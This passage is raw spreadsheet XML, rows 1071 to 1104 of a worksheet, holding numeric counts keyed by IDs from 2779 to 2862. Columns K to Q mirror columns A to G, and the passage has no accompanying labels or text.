        <v>13</v>
      </c>
      <c r="Q1071" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1072" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1072" s="7">
        <v>2779</v>
      </c>
      <c r="B1072" s="8">
        <v>0</v>
      </c>
      <c r="C1072" s="8">
        <v>0</v>
      </c>
      <c r="D1072" s="8">
        <v>0</v>
      </c>
      <c r="E1072" s="8">
        <v>0</v>
      </c>
      <c r="F1072" s="8">
        <v>3</v>
      </c>
      <c r="G1072" s="8">
        <v>0</v>
      </c>
      <c r="H1072" s="8">
        <v>3</v>
      </c>
      <c r="K1072" s="7">
        <v>2779</v>
      </c>
      <c r="L1072" s="8">
        <v>0</v>
      </c>
      <c r="M1072" s="8">
        <v>0</v>
      </c>
      <c r="N1072" s="8">
        <v>0</v>
      </c>
      <c r="O1072" s="8">
        <v>0</v>
      </c>
      <c r="P1072" s="8">
        <v>3</v>
      </c>
      <c r="Q1072" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1073" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1073" s="7">
        <v>2781</v>
      </c>
      <c r="B1073" s="8">
        <v>26</v>
      </c>
      <c r="C1073" s="8">
        <v>1</v>
      </c>
      <c r="D1073" s="8">
        <v>20</v>
      </c>
      <c r="E1073" s="8">
        <v>5</v>
      </c>
      <c r="F1073" s="8">
        <v>2</v>
      </c>
      <c r="G1073" s="8">
        <v>3</v>
      </c>
      <c r="H1073" s="8">
        <v>57</v>
      </c>
      <c r="K1073" s="7">
        <v>2781</v>
      </c>
      <c r="L1073" s="8">
        <v>26</v>
      </c>
      <c r="M1073" s="8">
        <v>1</v>
      </c>
      <c r="N1073" s="8">
        <v>20</v>
      </c>
      <c r="O1073" s="8">
        <v>5</v>
      </c>
      <c r="P1073" s="8">
        <v>2</v>
      </c>
      <c r="Q1073" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1074" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1074" s="7">
        <v>2782</v>
      </c>
      <c r="B1074" s="8">
        <v>26</v>
      </c>
      <c r="C1074" s="8">
        <v>0</v>
      </c>
      <c r="D1074" s="8">
        <v>5</v>
      </c>
      <c r="E1074" s="8">
        <v>0</v>
      </c>
      <c r="F1074" s="8">
        <v>6</v>
      </c>
      <c r="G1074" s="8">
        <v>6</v>
      </c>
      <c r="H1074" s="8">
        <v>43</v>
      </c>
      <c r="K1074" s="7">
        <v>2782</v>
      </c>
      <c r="L1074" s="8">
        <v>26</v>
      </c>
      <c r="M1074" s="8">
        <v>0</v>
      </c>
      <c r="N1074" s="8">
        <v>5</v>
      </c>
      <c r="O1074" s="8">
        <v>0</v>
      </c>
      <c r="P1074" s="8">
        <v>6</v>
      </c>
      <c r="Q1074" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1075" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1075" s="7">
        <v>2784</v>
      </c>
      <c r="B1075" s="8">
        <v>24</v>
      </c>
      <c r="C1075" s="8">
        <v>1</v>
      </c>
      <c r="D1075" s="8">
        <v>22</v>
      </c>
      <c r="E1075" s="8">
        <v>0</v>
      </c>
      <c r="F1075" s="8">
        <v>34</v>
      </c>
      <c r="G1075" s="8">
        <v>12</v>
      </c>
      <c r="H1075" s="8">
        <v>93</v>
      </c>
      <c r="K1075" s="7">
        <v>2784</v>
      </c>
      <c r="L1075" s="8">
        <v>24</v>
      </c>
      <c r="M1075" s="8">
        <v>1</v>
      </c>
      <c r="N1075" s="8">
        <v>22</v>
      </c>
      <c r="O1075" s="8">
        <v>0</v>
      </c>
      <c r="P1075" s="8">
        <v>34</v>
      </c>
      <c r="Q1075" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="1076" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1076" s="7">
        <v>2785</v>
      </c>
      <c r="B1076" s="8">
        <v>0</v>
      </c>
      <c r="C1076" s="8">
        <v>0</v>
      </c>
      <c r="D1076" s="8">
        <v>0</v>
      </c>
      <c r="E1076" s="8">
        <v>0</v>
      </c>
      <c r="F1076" s="8">
        <v>1</v>
      </c>
      <c r="G1076" s="8">
        <v>3</v>
      </c>
      <c r="H1076" s="8">
        <v>4</v>
      </c>
      <c r="K1076" s="7">
        <v>2785</v>
      </c>
      <c r="L1076" s="8">
        <v>0</v>
      </c>
      <c r="M1076" s="8">
        <v>0</v>
      </c>
      <c r="N1076" s="8">
        <v>0</v>
      </c>
      <c r="O1076" s="8">
        <v>0</v>
      </c>
      <c r="P1076" s="8">
        <v>1</v>
      </c>
      <c r="Q1076" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1077" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1077" s="7">
        <v>2791</v>
      </c>
      <c r="B1077" s="8">
        <v>20</v>
      </c>
      <c r="C1077" s="8">
        <v>1</v>
      </c>
      <c r="D1077" s="8">
        <v>1</v>
      </c>
      <c r="E1077" s="8">
        <v>4</v>
      </c>
      <c r="F1077" s="8">
        <v>0</v>
      </c>
      <c r="G1077" s="8">
        <v>0</v>
      </c>
      <c r="H1077" s="8">
        <v>26</v>
      </c>
      <c r="K1077" s="7">
        <v>2791</v>
      </c>
      <c r="L1077" s="8">
        <v>20</v>
      </c>
      <c r="M1077" s="8">
        <v>1</v>
      </c>
      <c r="N1077" s="8">
        <v>1</v>
      </c>
      <c r="O1077" s="8">
        <v>4</v>
      </c>
      <c r="P1077" s="8">
        <v>0</v>
      </c>
      <c r="Q1077" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1078" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1078" s="7">
        <v>2792</v>
      </c>
      <c r="B1078" s="8">
        <v>25</v>
      </c>
      <c r="C1078" s="8">
        <v>0</v>
      </c>
      <c r="D1078" s="8">
        <v>3</v>
      </c>
      <c r="E1078" s="8">
        <v>1</v>
      </c>
      <c r="F1078" s="8">
        <v>63</v>
      </c>
      <c r="G1078" s="8">
        <v>25</v>
      </c>
      <c r="H1078" s="8">
        <v>117</v>
      </c>
      <c r="K1078" s="7">
        <v>2792</v>
      </c>
      <c r="L1078" s="8">
        <v>25</v>
      </c>
      <c r="M1078" s="8">
        <v>0</v>
      </c>
      <c r="N1078" s="8">
        <v>3</v>
      </c>
      <c r="O1078" s="8">
        <v>1</v>
      </c>
      <c r="P1078" s="8">
        <v>63</v>
      </c>
      <c r="Q1078" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="1079" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1079" s="7">
        <v>2794</v>
      </c>
      <c r="B1079" s="8">
        <v>14</v>
      </c>
      <c r="C1079" s="8">
        <v>0</v>
      </c>
      <c r="D1079" s="8">
        <v>3</v>
      </c>
      <c r="E1079" s="8">
        <v>0</v>
      </c>
      <c r="F1079" s="8">
        <v>2</v>
      </c>
      <c r="G1079" s="8">
        <v>1</v>
      </c>
      <c r="H1079" s="8">
        <v>20</v>
      </c>
      <c r="K1079" s="7">
        <v>2794</v>
      </c>
      <c r="L1079" s="8">
        <v>14</v>
      </c>
      <c r="M1079" s="8">
        <v>0</v>
      </c>
      <c r="N1079" s="8">
        <v>3</v>
      </c>
      <c r="O1079" s="8">
        <v>0</v>
      </c>
      <c r="P1079" s="8">
        <v>2</v>
      </c>
      <c r="Q1079" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1080" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1080" s="7">
        <v>2795</v>
      </c>
      <c r="B1080" s="8">
        <v>26</v>
      </c>
      <c r="C1080" s="8">
        <v>1</v>
      </c>
      <c r="D1080" s="8">
        <v>19</v>
      </c>
      <c r="E1080" s="8">
        <v>9</v>
      </c>
      <c r="F1080" s="8">
        <v>14</v>
      </c>
      <c r="G1080" s="8">
        <v>164</v>
      </c>
      <c r="H1080" s="8">
        <v>233</v>
      </c>
      <c r="K1080" s="7">
        <v>2795</v>
      </c>
      <c r="L1080" s="8">
        <v>26</v>
      </c>
      <c r="M1080" s="8">
        <v>1</v>
      </c>
      <c r="N1080" s="8">
        <v>19</v>
      </c>
      <c r="O1080" s="8">
        <v>9</v>
      </c>
      <c r="P1080" s="8">
        <v>14</v>
      </c>
      <c r="Q1080" s="8">
        <v>164</v>
      </c>
    </row>
    <row r="1081" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1081" s="7">
        <v>2798</v>
      </c>
      <c r="B1081" s="8">
        <v>26</v>
      </c>
      <c r="C1081" s="8">
        <v>1</v>
      </c>
      <c r="D1081" s="8">
        <v>30</v>
      </c>
      <c r="E1081" s="8">
        <v>105</v>
      </c>
      <c r="F1081" s="8">
        <v>20</v>
      </c>
      <c r="G1081" s="8">
        <v>15</v>
      </c>
      <c r="H1081" s="8">
        <v>197</v>
      </c>
      <c r="K1081" s="7">
        <v>2798</v>
      </c>
      <c r="L1081" s="8">
        <v>26</v>
      </c>
      <c r="M1081" s="8">
        <v>1</v>
      </c>
      <c r="N1081" s="8">
        <v>30</v>
      </c>
      <c r="O1081" s="8">
        <v>105</v>
      </c>
      <c r="P1081" s="8">
        <v>20</v>
      </c>
      <c r="Q1081" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="1082" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1082" s="7">
        <v>2802</v>
      </c>
      <c r="B1082" s="8">
        <v>6</v>
      </c>
      <c r="C1082" s="8">
        <v>0</v>
      </c>
      <c r="D1082" s="8">
        <v>0</v>
      </c>
      <c r="E1082" s="8">
        <v>0</v>
      </c>
      <c r="F1082" s="8">
        <v>0</v>
      </c>
      <c r="G1082" s="8">
        <v>2</v>
      </c>
      <c r="H1082" s="8">
        <v>8</v>
      </c>
      <c r="K1082" s="7">
        <v>2802</v>
      </c>
      <c r="L1082" s="8">
        <v>6</v>
      </c>
      <c r="M1082" s="8">
        <v>0</v>
      </c>
      <c r="N1082" s="8">
        <v>0</v>
      </c>
      <c r="O1082" s="8">
        <v>0</v>
      </c>
      <c r="P1082" s="8">
        <v>0</v>
      </c>
      <c r="Q1082" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1083" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1083" s="7">
        <v>2810</v>
      </c>
      <c r="B1083" s="8">
        <v>24</v>
      </c>
      <c r="C1083" s="8">
        <v>0</v>
      </c>
      <c r="D1083" s="8">
        <v>5</v>
      </c>
      <c r="E1083" s="8">
        <v>1</v>
      </c>
      <c r="F1083" s="8">
        <v>1</v>
      </c>
      <c r="G1083" s="8">
        <v>2</v>
      </c>
      <c r="H1083" s="8">
        <v>33</v>
      </c>
      <c r="K1083" s="7">
        <v>2810</v>
      </c>
      <c r="L1083" s="8">
        <v>24</v>
      </c>
      <c r="M1083" s="8">
        <v>0</v>
      </c>
      <c r="N1083" s="8">
        <v>5</v>
      </c>
      <c r="O1083" s="8">
        <v>1</v>
      </c>
      <c r="P1083" s="8">
        <v>1</v>
      </c>
      <c r="Q1083" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1084" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1084" s="7">
        <v>2811</v>
      </c>
      <c r="B1084" s="8">
        <v>25</v>
      </c>
      <c r="C1084" s="8">
        <v>1</v>
      </c>
      <c r="D1084" s="8">
        <v>2</v>
      </c>
      <c r="E1084" s="8">
        <v>2</v>
      </c>
      <c r="F1084" s="8">
        <v>10</v>
      </c>
      <c r="G1084" s="8">
        <v>7</v>
      </c>
      <c r="H1084" s="8">
        <v>47</v>
      </c>
      <c r="K1084" s="7">
        <v>2811</v>
      </c>
      <c r="L1084" s="8">
        <v>25</v>
      </c>
      <c r="M1084" s="8">
        <v>1</v>
      </c>
      <c r="N1084" s="8">
        <v>2</v>
      </c>
      <c r="O1084" s="8">
        <v>2</v>
      </c>
      <c r="P1084" s="8">
        <v>10</v>
      </c>
      <c r="Q1084" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="1085" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1085" s="7">
        <v>2813</v>
      </c>
      <c r="B1085" s="8">
        <v>30</v>
      </c>
      <c r="C1085" s="8">
        <v>0</v>
      </c>
      <c r="D1085" s="8">
        <v>10</v>
      </c>
      <c r="E1085" s="8">
        <v>0</v>
      </c>
      <c r="F1085" s="8">
        <v>4</v>
      </c>
      <c r="G1085" s="8">
        <v>0</v>
      </c>
      <c r="H1085" s="8">
        <v>44</v>
      </c>
      <c r="K1085" s="7">
        <v>2813</v>
      </c>
      <c r="L1085" s="8">
        <v>30</v>
      </c>
      <c r="M1085" s="8">
        <v>0</v>
      </c>
      <c r="N1085" s="8">
        <v>10</v>
      </c>
      <c r="O1085" s="8">
        <v>0</v>
      </c>
      <c r="P1085" s="8">
        <v>4</v>
      </c>
      <c r="Q1085" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1086" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1086" s="7">
        <v>2814</v>
      </c>
      <c r="B1086" s="8">
        <v>26</v>
      </c>
      <c r="C1086" s="8">
        <v>0</v>
      </c>
      <c r="D1086" s="8">
        <v>5</v>
      </c>
      <c r="E1086" s="8">
        <v>0</v>
      </c>
      <c r="F1086" s="8">
        <v>8</v>
      </c>
      <c r="G1086" s="8">
        <v>2</v>
      </c>
      <c r="H1086" s="8">
        <v>41</v>
      </c>
      <c r="K1086" s="7">
        <v>2814</v>
      </c>
      <c r="L1086" s="8">
        <v>26</v>
      </c>
      <c r="M1086" s="8">
        <v>0</v>
      </c>
      <c r="N1086" s="8">
        <v>5</v>
      </c>
      <c r="O1086" s="8">
        <v>0</v>
      </c>
      <c r="P1086" s="8">
        <v>8</v>
      </c>
      <c r="Q1086" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1087" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1087" s="7">
        <v>2817</v>
      </c>
      <c r="B1087" s="8">
        <v>26</v>
      </c>
      <c r="C1087" s="8">
        <v>1</v>
      </c>
      <c r="D1087" s="8">
        <v>35</v>
      </c>
      <c r="E1087" s="8">
        <v>17</v>
      </c>
      <c r="F1087" s="8">
        <v>9</v>
      </c>
      <c r="G1087" s="8">
        <v>4</v>
      </c>
      <c r="H1087" s="8">
        <v>92</v>
      </c>
      <c r="K1087" s="7">
        <v>2817</v>
      </c>
      <c r="L1087" s="8">
        <v>26</v>
      </c>
      <c r="M1087" s="8">
        <v>1</v>
      </c>
      <c r="N1087" s="8">
        <v>35</v>
      </c>
      <c r="O1087" s="8">
        <v>17</v>
      </c>
      <c r="P1087" s="8">
        <v>9</v>
      </c>
      <c r="Q1087" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1088" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1088" s="7">
        <v>2818</v>
      </c>
      <c r="B1088" s="8">
        <v>24</v>
      </c>
      <c r="C1088" s="8">
        <v>0</v>
      </c>
      <c r="D1088" s="8">
        <v>0</v>
      </c>
      <c r="E1088" s="8">
        <v>0</v>
      </c>
      <c r="F1088" s="8">
        <v>10</v>
      </c>
      <c r="G1088" s="8">
        <v>5</v>
      </c>
      <c r="H1088" s="8">
        <v>39</v>
      </c>
      <c r="K1088" s="7">
        <v>2818</v>
      </c>
      <c r="L1088" s="8">
        <v>24</v>
      </c>
      <c r="M1088" s="8">
        <v>0</v>
      </c>
      <c r="N1088" s="8">
        <v>0</v>
      </c>
      <c r="O1088" s="8">
        <v>0</v>
      </c>
      <c r="P1088" s="8">
        <v>10</v>
      </c>
      <c r="Q1088" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1089" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1089" s="7">
        <v>2820</v>
      </c>
      <c r="B1089" s="8">
        <v>25</v>
      </c>
      <c r="C1089" s="8">
        <v>1</v>
      </c>
      <c r="D1089" s="8">
        <v>3</v>
      </c>
      <c r="E1089" s="8">
        <v>1</v>
      </c>
      <c r="F1089" s="8">
        <v>15</v>
      </c>
      <c r="G1089" s="8">
        <v>4</v>
      </c>
      <c r="H1089" s="8">
        <v>49</v>
      </c>
      <c r="K1089" s="7">
        <v>2820</v>
      </c>
      <c r="L1089" s="8">
        <v>25</v>
      </c>
      <c r="M1089" s="8">
        <v>1</v>
      </c>
      <c r="N1089" s="8">
        <v>3</v>
      </c>
      <c r="O1089" s="8">
        <v>1</v>
      </c>
      <c r="P1089" s="8">
        <v>15</v>
      </c>
      <c r="Q1089" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1090" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1090" s="7">
        <v>2821</v>
      </c>
      <c r="B1090" s="8">
        <v>24</v>
      </c>
      <c r="C1090" s="8">
        <v>2</v>
      </c>
      <c r="D1090" s="8">
        <v>0</v>
      </c>
      <c r="E1090" s="8">
        <v>0</v>
      </c>
      <c r="F1090" s="8">
        <v>12</v>
      </c>
      <c r="G1090" s="8">
        <v>0</v>
      </c>
      <c r="H1090" s="8">
        <v>38</v>
      </c>
      <c r="K1090" s="7">
        <v>2821</v>
      </c>
      <c r="L1090" s="8">
        <v>24</v>
      </c>
      <c r="M1090" s="8">
        <v>2</v>
      </c>
      <c r="N1090" s="8">
        <v>0</v>
      </c>
      <c r="O1090" s="8">
        <v>0</v>
      </c>
      <c r="P1090" s="8">
        <v>12</v>
      </c>
      <c r="Q1090" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1091" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1091" s="7">
        <v>2822</v>
      </c>
      <c r="B1091" s="8">
        <v>24</v>
      </c>
      <c r="C1091" s="8">
        <v>1</v>
      </c>
      <c r="D1091" s="8">
        <v>10</v>
      </c>
      <c r="E1091" s="8">
        <v>15</v>
      </c>
      <c r="F1091" s="8">
        <v>43</v>
      </c>
      <c r="G1091" s="8">
        <v>47</v>
      </c>
      <c r="H1091" s="8">
        <v>140</v>
      </c>
      <c r="K1091" s="7">
        <v>2822</v>
      </c>
      <c r="L1091" s="8">
        <v>24</v>
      </c>
      <c r="M1091" s="8">
        <v>1</v>
      </c>
      <c r="N1091" s="8">
        <v>10</v>
      </c>
      <c r="O1091" s="8">
        <v>15</v>
      </c>
      <c r="P1091" s="8">
        <v>43</v>
      </c>
      <c r="Q1091" s="8">
        <v>47</v>
      </c>
    </row>
    <row r="1092" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1092" s="7">
        <v>2826</v>
      </c>
      <c r="B1092" s="8">
        <v>24</v>
      </c>
      <c r="C1092" s="8">
        <v>0</v>
      </c>
      <c r="D1092" s="8">
        <v>0</v>
      </c>
      <c r="E1092" s="8">
        <v>0</v>
      </c>
      <c r="F1092" s="8">
        <v>17</v>
      </c>
      <c r="G1092" s="8">
        <v>6</v>
      </c>
      <c r="H1092" s="8">
        <v>47</v>
      </c>
      <c r="K1092" s="7">
        <v>2826</v>
      </c>
      <c r="L1092" s="8">
        <v>24</v>
      </c>
      <c r="M1092" s="8">
        <v>0</v>
      </c>
      <c r="N1092" s="8">
        <v>0</v>
      </c>
      <c r="O1092" s="8">
        <v>0</v>
      </c>
      <c r="P1092" s="8">
        <v>17</v>
      </c>
      <c r="Q1092" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1093" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1093" s="7">
        <v>2827</v>
      </c>
      <c r="B1093" s="8">
        <v>6</v>
      </c>
      <c r="C1093" s="8">
        <v>1</v>
      </c>
      <c r="D1093" s="8">
        <v>0</v>
      </c>
      <c r="E1093" s="8">
        <v>0</v>
      </c>
      <c r="F1093" s="8">
        <v>5</v>
      </c>
      <c r="G1093" s="8">
        <v>2</v>
      </c>
      <c r="H1093" s="8">
        <v>14</v>
      </c>
      <c r="K1093" s="7">
        <v>2827</v>
      </c>
      <c r="L1093" s="8">
        <v>6</v>
      </c>
      <c r="M1093" s="8">
        <v>1</v>
      </c>
      <c r="N1093" s="8">
        <v>0</v>
      </c>
      <c r="O1093" s="8">
        <v>0</v>
      </c>
      <c r="P1093" s="8">
        <v>5</v>
      </c>
      <c r="Q1093" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1094" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1094" s="7">
        <v>2835</v>
      </c>
      <c r="B1094" s="8">
        <v>25</v>
      </c>
      <c r="C1094" s="8">
        <v>2</v>
      </c>
      <c r="D1094" s="8">
        <v>20</v>
      </c>
      <c r="E1094" s="8">
        <v>30</v>
      </c>
      <c r="F1094" s="8">
        <v>156</v>
      </c>
      <c r="G1094" s="8">
        <v>40</v>
      </c>
      <c r="H1094" s="8">
        <v>273</v>
      </c>
      <c r="K1094" s="7">
        <v>2835</v>
      </c>
      <c r="L1094" s="8">
        <v>25</v>
      </c>
      <c r="M1094" s="8">
        <v>2</v>
      </c>
      <c r="N1094" s="8">
        <v>20</v>
      </c>
      <c r="O1094" s="8">
        <v>30</v>
      </c>
      <c r="P1094" s="8">
        <v>156</v>
      </c>
      <c r="Q1094" s="8">
        <v>40</v>
      </c>
    </row>
    <row r="1095" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1095" s="7">
        <v>2837</v>
      </c>
      <c r="B1095" s="8">
        <v>20</v>
      </c>
      <c r="C1095" s="8">
        <v>0</v>
      </c>
      <c r="D1095" s="8">
        <v>3</v>
      </c>
      <c r="E1095" s="8">
        <v>0</v>
      </c>
      <c r="F1095" s="8">
        <v>8</v>
      </c>
      <c r="G1095" s="8">
        <v>2</v>
      </c>
      <c r="H1095" s="8">
        <v>33</v>
      </c>
      <c r="K1095" s="7">
        <v>2837</v>
      </c>
      <c r="L1095" s="8">
        <v>20</v>
      </c>
      <c r="M1095" s="8">
        <v>0</v>
      </c>
      <c r="N1095" s="8">
        <v>3</v>
      </c>
      <c r="O1095" s="8">
        <v>0</v>
      </c>
      <c r="P1095" s="8">
        <v>8</v>
      </c>
      <c r="Q1095" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1096" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1096" s="7">
        <v>2838</v>
      </c>
      <c r="B1096" s="8">
        <v>7</v>
      </c>
      <c r="C1096" s="8">
        <v>1</v>
      </c>
      <c r="D1096" s="8">
        <v>17</v>
      </c>
      <c r="E1096" s="8">
        <v>0</v>
      </c>
      <c r="F1096" s="8">
        <v>2</v>
      </c>
      <c r="G1096" s="8">
        <v>3</v>
      </c>
      <c r="H1096" s="8">
        <v>30</v>
      </c>
      <c r="K1096" s="7">
        <v>2838</v>
      </c>
      <c r="L1096" s="8">
        <v>7</v>
      </c>
      <c r="M1096" s="8">
        <v>1</v>
      </c>
      <c r="N1096" s="8">
        <v>17</v>
      </c>
      <c r="O1096" s="8">
        <v>0</v>
      </c>
      <c r="P1096" s="8">
        <v>2</v>
      </c>
      <c r="Q1096" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1097" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1097" s="7">
        <v>2839</v>
      </c>
      <c r="B1097" s="8">
        <v>0</v>
      </c>
      <c r="C1097" s="8">
        <v>0</v>
      </c>
      <c r="D1097" s="8">
        <v>0</v>
      </c>
      <c r="E1097" s="8">
        <v>0</v>
      </c>
      <c r="F1097" s="8">
        <v>1</v>
      </c>
      <c r="G1097" s="8">
        <v>3</v>
      </c>
      <c r="H1097" s="8">
        <v>4</v>
      </c>
      <c r="K1097" s="7">
        <v>2839</v>
      </c>
      <c r="L1097" s="8">
        <v>0</v>
      </c>
      <c r="M1097" s="8">
        <v>0</v>
      </c>
      <c r="N1097" s="8">
        <v>0</v>
      </c>
      <c r="O1097" s="8">
        <v>0</v>
      </c>
      <c r="P1097" s="8">
        <v>1</v>
      </c>
      <c r="Q1097" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1098" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1098" s="7">
        <v>2844</v>
      </c>
      <c r="B1098" s="8">
        <v>25</v>
      </c>
      <c r="C1098" s="8">
        <v>1</v>
      </c>
      <c r="D1098" s="8">
        <v>10</v>
      </c>
      <c r="E1098" s="8">
        <v>0</v>
      </c>
      <c r="F1098" s="8">
        <v>3</v>
      </c>
      <c r="G1098" s="8">
        <v>2</v>
      </c>
      <c r="H1098" s="8">
        <v>41</v>
      </c>
      <c r="K1098" s="7">
        <v>2844</v>
      </c>
      <c r="L1098" s="8">
        <v>25</v>
      </c>
      <c r="M1098" s="8">
        <v>1</v>
      </c>
      <c r="N1098" s="8">
        <v>10</v>
      </c>
      <c r="O1098" s="8">
        <v>0</v>
      </c>
      <c r="P1098" s="8">
        <v>3</v>
      </c>
      <c r="Q1098" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1099" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1099" s="7">
        <v>2850</v>
      </c>
      <c r="B1099" s="8">
        <v>31</v>
      </c>
      <c r="C1099" s="8">
        <v>0</v>
      </c>
      <c r="D1099" s="8">
        <v>0</v>
      </c>
      <c r="E1099" s="8">
        <v>0</v>
      </c>
      <c r="F1099" s="8">
        <v>8</v>
      </c>
      <c r="G1099" s="8">
        <v>2</v>
      </c>
      <c r="H1099" s="8">
        <v>41</v>
      </c>
      <c r="K1099" s="7">
        <v>2850</v>
      </c>
      <c r="L1099" s="8">
        <v>31</v>
      </c>
      <c r="M1099" s="8">
        <v>0</v>
      </c>
      <c r="N1099" s="8">
        <v>0</v>
      </c>
      <c r="O1099" s="8">
        <v>0</v>
      </c>
      <c r="P1099" s="8">
        <v>8</v>
      </c>
      <c r="Q1099" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1100" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1100" s="7">
        <v>2853</v>
      </c>
      <c r="B1100" s="8">
        <v>25</v>
      </c>
      <c r="C1100" s="8">
        <v>1</v>
      </c>
      <c r="D1100" s="8">
        <v>36</v>
      </c>
      <c r="E1100" s="8">
        <v>8</v>
      </c>
      <c r="F1100" s="8">
        <v>37</v>
      </c>
      <c r="G1100" s="8">
        <v>26</v>
      </c>
      <c r="H1100" s="8">
        <v>133</v>
      </c>
      <c r="K1100" s="7">
        <v>2853</v>
      </c>
      <c r="L1100" s="8">
        <v>25</v>
      </c>
      <c r="M1100" s="8">
        <v>1</v>
      </c>
      <c r="N1100" s="8">
        <v>36</v>
      </c>
      <c r="O1100" s="8">
        <v>8</v>
      </c>
      <c r="P1100" s="8">
        <v>37</v>
      </c>
      <c r="Q1100" s="8">
        <v>26</v>
      </c>
    </row>
    <row r="1101" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1101" s="7">
        <v>2856</v>
      </c>
      <c r="B1101" s="8">
        <v>5</v>
      </c>
      <c r="C1101" s="8">
        <v>0</v>
      </c>
      <c r="D1101" s="8">
        <v>384</v>
      </c>
      <c r="E1101" s="8">
        <v>575</v>
      </c>
      <c r="F1101" s="8">
        <v>90</v>
      </c>
      <c r="G1101" s="8">
        <v>67</v>
      </c>
      <c r="H1101" s="8">
        <v>1121</v>
      </c>
      <c r="K1101" s="7">
        <v>2856</v>
      </c>
      <c r="L1101" s="8">
        <v>5</v>
      </c>
      <c r="M1101" s="8">
        <v>0</v>
      </c>
      <c r="N1101" s="8">
        <v>384</v>
      </c>
      <c r="O1101" s="8">
        <v>575</v>
      </c>
      <c r="P1101" s="8">
        <v>90</v>
      </c>
      <c r="Q1101" s="8">
        <v>67</v>
      </c>
    </row>
    <row r="1102" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1102" s="7">
        <v>2857</v>
      </c>
      <c r="B1102" s="8">
        <v>25</v>
      </c>
      <c r="C1102" s="8">
        <v>1</v>
      </c>
      <c r="D1102" s="8">
        <v>220</v>
      </c>
      <c r="E1102" s="8">
        <v>366</v>
      </c>
      <c r="F1102" s="8">
        <v>38</v>
      </c>
      <c r="G1102" s="8">
        <v>18</v>
      </c>
      <c r="H1102" s="8">
        <v>668</v>
      </c>
      <c r="K1102" s="7">
        <v>2857</v>
      </c>
      <c r="L1102" s="8">
        <v>25</v>
      </c>
      <c r="M1102" s="8">
        <v>1</v>
      </c>
      <c r="N1102" s="8">
        <v>220</v>
      </c>
      <c r="O1102" s="8">
        <v>366</v>
      </c>
      <c r="P1102" s="8">
        <v>38</v>
      </c>
      <c r="Q1102" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1103" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1103" s="7">
        <v>2861</v>
      </c>
      <c r="B1103" s="8">
        <v>7</v>
      </c>
      <c r="C1103" s="8">
        <v>2</v>
      </c>
      <c r="D1103" s="8">
        <v>21</v>
      </c>
      <c r="E1103" s="8">
        <v>1</v>
      </c>
      <c r="F1103" s="8">
        <v>7</v>
      </c>
      <c r="G1103" s="8">
        <v>4</v>
      </c>
      <c r="H1103" s="8">
        <v>42</v>
      </c>
      <c r="K1103" s="7">
        <v>2861</v>
      </c>
      <c r="L1103" s="8">
        <v>7</v>
      </c>
      <c r="M1103" s="8">
        <v>2</v>
      </c>
      <c r="N1103" s="8">
        <v>21</v>
      </c>
      <c r="O1103" s="8">
        <v>1</v>
      </c>
      <c r="P1103" s="8">
        <v>7</v>
      </c>
      <c r="Q1103" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1104" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1104" s="7">
        <v>2862</v>
      </c>
      <c r="B1104" s="8">
        <v>1</v>
      </c>
      <c r="C1104" s="8">
        <v>2</v>
      </c>
      <c r="D1104" s="8">
        <v>1</v>
      </c>
      <c r="E1104" s="8">
        <v>4</v>
      </c>
      <c r="F1104" s="8">
        <v>3</v>
      </c>
      <c r="G1104" s="8">
        <v>5</v>
      </c>
      <c r="H1104" s="8">
        <v>16</v>
      </c>
